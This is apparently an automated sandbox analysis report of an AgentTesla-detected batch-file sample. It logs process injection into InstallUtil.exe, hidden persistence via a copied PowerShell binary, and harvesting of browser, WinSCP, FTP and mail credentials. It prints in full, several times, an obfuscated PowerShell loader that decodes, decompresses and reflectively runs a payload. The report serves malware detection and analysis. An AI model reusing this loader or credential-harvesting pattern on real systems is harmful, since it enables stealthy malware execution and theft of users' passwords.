                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7A0000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7A0000Jump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7A2000Jump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7DE000Jump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7E0000Jump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5DB008Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"Jump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\MustFlush.bat" "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\MustFlush.bat.DmfJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\MustFlush.bat.DmfJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\AppData\Roaming\MustFlush.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf c:\users\user\desktop\ilzhnx3jac.bat.dmf -windowstyle hidden -command "$ddjudzf = get-content 'c:\users\user\desktop\ilzhnx3jac.bat' | select-object -last 1; $qttfylkd = [system.convert]::frombase64string($ddjudzf);$cohunv = new-object system.io.memorystream( , $qttfylkd );$wepcwpnqbxa = new-object system.io.memorystream;$xtcusn = new-object system.io.compression.gzipstream $cohunv, ([io.compression.compressionmode]::decompress);$xtcusn.copyto( $wepcwpnqbxa );$xtcusn.close();$cohunv.close();[byte[]] $qttfylkd = $wepcwpnqbxa.toarray();[array]::reverse($qttfylkd); $arcfhlmphge = [system.appdomain]::currentdomain.load($qttfylkd); $cqife = $arcfhlmphge.entrypoint; $cqife.declaringtype.invokemember($cqife.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)| out-null"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf c:\users\user\appdata\roaming\mustflush.bat.dmf -windowstyle hidden -command "$ddjudzf = get-content 'c:\users\user\appdata\roaming\mustflush.bat' | select-object -last 1; $qttfylkd = [system.convert]::frombase64string($ddjudzf);$cohunv = new-object system.io.memorystream( , $qttfylkd );$wepcwpnqbxa = new-object system.io.memorystream;$xtcusn = new-object system.io.compression.gzipstream $cohunv, ([io.compression.compressionmode]::decompress);$xtcusn.copyto( $wepcwpnqbxa );$xtcusn.close();$cohunv.close();[byte[]] $qttfylkd = $wepcwpnqbxa.toarray();[array]::reverse($qttfylkd); $arcfhlmphge = [system.appdomain]::currentdomain.load($qttfylkd); $cqife = $arcfhlmphge.entrypoint; $cqife.declaringtype.invokemember($cqife.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)| out-null"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf c:\users\user\desktop\ilzhnx3jac.bat.dmf -windowstyle hidden -command "$ddjudzf = get-content 'c:\users\user\desktop\ilzhnx3jac.bat' | select-object -last 1; $qttfylkd = [system.convert]::frombase64string($ddjudzf);$cohunv = new-object system.io.memorystream( , $qttfylkd );$wepcwpnqbxa = new-object system.io.memorystream;$xtcusn = new-object system.io.compression.gzipstream $cohunv, ([io.compression.compressionmode]::decompress);$xtcusn.copyto( $wepcwpnqbxa );$xtcusn.close();$cohunv.close();[byte[]] $qttfylkd = $wepcwpnqbxa.toarray();[array]::reverse($qttfylkd); $arcfhlmphge = [system.appdomain]::currentdomain.load($qttfylkd); $cqife = $arcfhlmphge.entrypoint; $cqife.declaringtype.invokemember($cqife.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)| out-null"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf c:\users\user\appdata\roaming\mustflush.bat.dmf -windowstyle hidden -command "$ddjudzf = get-content 'c:\users\user\appdata\roaming\mustflush.bat' | select-object -last 1; $qttfylkd = [system.convert]::frombase64string($ddjudzf);$cohunv = new-object system.io.memorystream( , $qttfylkd );$wepcwpnqbxa = new-object system.io.memorystream;$xtcusn = new-object system.io.compression.gzipstream $cohunv, ([io.compression.compressionmode]::decompress);$xtcusn.copyto( $wepcwpnqbxa );$xtcusn.close();$cohunv.close();[byte[]] $qttfylkd = $wepcwpnqbxa.toarray();[array]::reverse($qttfylkd); $arcfhlmphge = [system.appdomain]::currentdomain.load($qttfylkd); $cqife = $arcfhlmphge.entrypoint; $cqife.declaringtype.invokemember($cqife.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)| out-null"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.InstallUtil.exe.7a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.MustFlush.bat.Dmf.6613670.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.MustFlush.bat.Dmf.6613670.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.1517390065.0000000002711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3806878045.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1517390065.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3806878045.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3806878045.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1517390065.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7176, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7684, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.InstallUtil.exe.7a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.MustFlush.bat.Dmf.6613670.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.MustFlush.bat.Dmf.6613670.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1517390065.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3806878045.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7176, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7684, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.InstallUtil.exe.7a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.MustFlush.bat.Dmf.6613670.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.MustFlush.bat.Dmf.6613670.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.1517390065.0000000002711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3806878045.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1517390065.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3806878045.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3806878045.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
